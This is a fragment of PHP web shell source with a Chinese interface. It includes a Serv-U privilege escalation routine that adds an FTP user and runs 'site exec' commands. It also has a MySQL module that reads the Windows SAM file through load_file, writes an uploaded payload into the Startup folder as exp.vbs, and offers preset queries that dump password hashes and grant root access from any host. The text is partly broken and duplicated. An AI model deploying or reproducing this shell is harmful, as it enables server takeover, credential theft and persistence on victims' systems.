"; $sendbuf = "USER ".$_POST["SUUser"]."\r\n"; @fputs($sock, $sendbuf, strlen($sendbuf)); echo "发送数据包: $sendbuf
"; $recvbuf = @fgets($sock, 1024); echo "返回数据包: $recvbuf
"; $sendbuf = "PASS ".$_POST["SUPass"]."\r\n"; @fputs($sock, $sendbuf, strlen($sendbuf)); echo "发送数据包: $sendbuf
"; $recvbuf = @fgets($sock, 1024); echo "返回数据包: $recvbuf
"; $sendbuf = "SITE MAINTENANCE\r\n"; @fputs($sock, $sendbuf, strlen($sendbuf)); echo "发送数据包: $sendbuf
"; $recvbuf = @fgets($sock, 1024); echo "返回数据包: $recvbuf
"; $sendbuf = $domain; @fputs($sock, $sendbuf, strlen($sendbuf)); echo "发送数据包: $sendbuf
"; $recvbuf = @fgets($sock, 1024); echo "返回数据包: $recvbuf
"; $sendbuf = $adduser; @fputs($sock, $sendbuf, strlen($sendbuf)); echo "发送数据包: $sendbuf
"; $recvbuf = @fgets($sock, 1024); echo "返回数据包: $recvbuf
"; if(!empty($_POST['SUCommand'])) { $exp = @fsockopen("127.0.0.1", "21", &$errno, &$errstr, 10); $recvbuf = @fgets($exp, 1024); echo "返回数据包: $recvbuf
"; $sendbuf = "USER ".$_POST['user']."\r\n"; @fputs($exp, $sendbuf, strlen($sendbuf)); echo "发送数据包: $sendbuf
"; $recvbuf = @fgets($exp, 1024); echo "返回数据包: $recvbuf
"; $sendbuf = "PASS ".$_POST['password']."\r\n"; @fputs($exp, $sendbuf, strlen($sendbuf)); echo "发送数据包: $sendbuf
"; $recvbuf = @fgets($exp, 1024); echo "返回数据包: $recvbuf
"; $sendbuf = "site exec ".$_POST["SUCommand"]."\r\n"; @fputs($exp, $sendbuf, strlen($sendbuf)); echo "发送数据包: site exec ".$_POST["SUCommand"]."
"; $recvbuf = @fgets($exp, 1024); echo "返回数据包: $recvbuf
"; $sendbuf = $deldomain; @fputs($sock, $sendbuf, strlen($sendbuf)); echo "发送数据包: $sendbuf
"; $recvbuf = @fgets($sock, 1024); echo "返回数据包: $recvbuf
"; @fclose($exp); } @fclose($sock); echo '
'; } } function Mysql_n() { $MSG_BOX = ''; $mhost = 'localhost'; $muser = 'root'; $mport = '3306'; $mpass = ''; $mdata = 'mysql'; $msql = 'select version();'; if(isset($_POST['mhost']) && isset($_POST['muser'])) { $mhost = $_POST['mhost']; $muser = $_POST['muser']; $mpass = $_POST['mpass']; $mdata = $_POST['mdata']; $mport = $_POST['mport']; if($conn = mysql_connect($mhost.':'.$mport,$muser,$mpass)) @mysql_select_db($mdata); else $MSG_BOX = '连接MYSQL失败'; } $downfile = 'c:/windows/repair/sam'; if(!empty($_POST['downfile'])) { $downfile = File_Str($_POST['downfile']); $binpath = bin2hex($downfile); $query = 'select load_file(0x'.$binpath.')'; if($result = @mysql_query($query,$conn)) { $k = 0; $downcode = ''; while($row = @mysql_fetch_array($result)){$downcode .= $row[$k];$k++;} $filedown = basename($downfile); if(!$filedown) $filedown = 'spider.tmp'; $array = explode('.', $filedown); $arrayend = array_pop($array); header('Content-type: application/x-'.$arrayend); header('Content-Disposition: attachment; filename='.$filedown); header('Content-Length: '.strlen($downcode)); echo $downcode; exit; } else $MSG_BOX = '下载文件失败'; } $o = isset($_GET['o']) ? $_GET['o'] : ''; Root_CSS(); print<<"; $sendbuf = "USER ".$_POST["SUUser"]."\r\n"; @fputs($sock, $sendbuf, strlen($sendbuf)); echo "发送数据包: $sendbuf
"; $recvbuf = @fgets($sock, 1024); echo "返回数据包: $recvbuf
"; $sendbuf = "PASS ".$_POST["SUPass"]."\r\n"; @fputs($sock, $sendbuf, strlen($sendbuf)); echo "发送数据包: $sendbuf
"; $recvbuf = @fgets($sock, 1024); echo "返回数据包: $recvbuf
"; $sendbuf = "SITE MAINTENANCE\r\n"; @fputs($sock, $sendbuf, strlen($sendbuf)); echo "发送数据包: $sendbuf
"; $recvbuf = @fgets($sock, 1024); echo "返回数据包: $recvbuf
"; $sendbuf = $domain; @fputs($sock, $sendbuf, strlen($sendbuf)); echo "发送数据包: $sendbuf
"; $recvbuf = @fgets($sock, 1024); echo "返回数据包: $recvbuf
"; $sendbuf = $adduser; @fputs($sock, $sendbuf, strlen($sendbuf)); echo "发送数据包: $sendbuf
"; $recvbuf = @fgets($sock, 1024); echo "返回数据包: $recvbuf
"; if(!empty($_POST['SUCommand'])) { $exp = @fsockopen("127.0.0.1", "21", &$errno, &$errstr, 10); $recvbuf = @fgets($exp, 1024); echo "返回数据包: $recvbuf
"; $sendbuf = "USER ".$_POST['user']."\r\n"; @fputs($exp, $sendbuf, strlen($sendbuf)); echo "发送数据包: $sendbuf
"; $recvbuf = @fgets($exp, 1024); echo "返回数据包: $recvbuf
"; $sendbuf = "PASS ".$_POST['password']."\r\n"; @fputs($exp, $sendbuf, strlen($sendbuf)); echo "发送数据包: $sendbuf
"; $recvbuf = @fgets($exp, 1024); echo "返回数据包: $recvbuf
"; $sendbuf = "site exec ".$_POST["SUCommand"]."\r\n"; @fputs($exp, $sendbuf, strlen($sendbuf)); echo "发送数据包: site exec ".$_POST["SUCommand"]."
"; $recvbuf = @fgets($exp, 1024); echo "返回数据包: $recvbuf
"; $sendbuf = $deldomain; @fputs($sock, $sendbuf, strlen($sendbuf)); echo "发送数据包: $sendbuf
"; $recvbuf = @fgets($sock, 1024); echo "返回数据包: $recvbuf
"; @fclose($exp); } @fclose($sock); echo '
地址
端口
用户
密码
库名
END;
if($o == 'u') { $uppath = 'C:/Documents and Settings/All Users/「开始」菜单/程序/启动/exp.vbs'; if(!empty($_POST['uppath'])) { $uppath = $_POST['uppath']; $query = 'Create TABLE a (cmd text NOT NULL);'; if(@mysql_query($query,$conn)) { if($tmpcode = File_Read($_FILES['upfile']['tmp_name'])){$filecode = bin2hex(File_Read($tmpcode));} else{$tmp = File_Str(dirname(__FILE__)).'/upfile.tmp';if(File_Up($_FILES['upfile']['tmp_name'],$tmp)){$filecode = bin2hex(File_Read($tmp));@unlink($tmp);}} $query = 'Insert INTO a (cmd) VALUES(CONVERT(0x'.$filecode.',CHAR));'; if(@mysql_query($query,$conn)) { $query = 'SELECT cmd FROM a INTO DUMPFILE \''.$uppath.'\';'; $MSG_BOX = @mysql_query($query,$conn) ? '上传文件成功' : '上传文件失败'; } else $MSG_BOX = '插入临时表失败'; @mysql_query('Drop TABLE IF EXISTS a;',$conn); } else $MSG_BOX = '创建临时表失败'; } print<<
上传路径
选择文件
上传路径
选择文件
END;
} elseif($o == 'd') { print<<
下载文件
下载文件
END;
} else { if(!empty($_POST['msql'])) { $msql = $_POST['msql']; if($result = @mysql_query($msql,$conn)) { $MSG_BOX = '执行SQL语句成功
'; $k = 0; while($row = @mysql_fetch_array($result)){$MSG_BOX .= $row[$k];$k++;} } else $MSG_BOX .= mysql_error(); } print<<
function nFull(i){
Str = new Array(15);
Str[0] = "select command Or input manual";
Str[1] = "select version();";
Str[2] = "select @@character_set_database;";
Str[3] = "show databases;";
Str[4] = "show tables;";
Str[5] = "show columns from table_name;";
Str[6] = "select @@hostname;";
Str[7] = "select @@version_compile_os;";
Str[8] = "select @@basedir;";
Str[9] = "select @@datadir;";
Str[10] = "describe table_name;";
Str[11] = "select User,Password from mysql.user;";
Str[12] = "select load_file(0x633A5C5C77696E646F77735C73797374656D33325C5C696E65747372765C5C6D657461626173652E786D6C);";
Str[13] = "select 'testtest' into outfile '/var/www/html/test.txt' from mysql.user;";
Str[14] = "GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY '123456' WITH GRANT OPTION;";
nform.msql.value = Str[i];
return true;
}
'; $k = 0; while($row = @mysql_fetch_array($result)){$MSG_BOX .= $row[$k];$k++;} } else $MSG_BOX .= mysql_error(); } print<<
END;
if(!empty($_POST['msql'])) { $msql = $_POST['msql']; if($result = @mysql_query($msql,$conn)) { $MSG_BOX = 'execute sql statement success
'; $row=mysql_fetch_row($result); echo ''."
"; mysql_free_result($result); } else $MSG_BOX .= mysql_error(); } } echo '
'.$MSG_BOX.'
'; $row=mysql_fetch_row($result); echo '
'.$MSG_BOX.'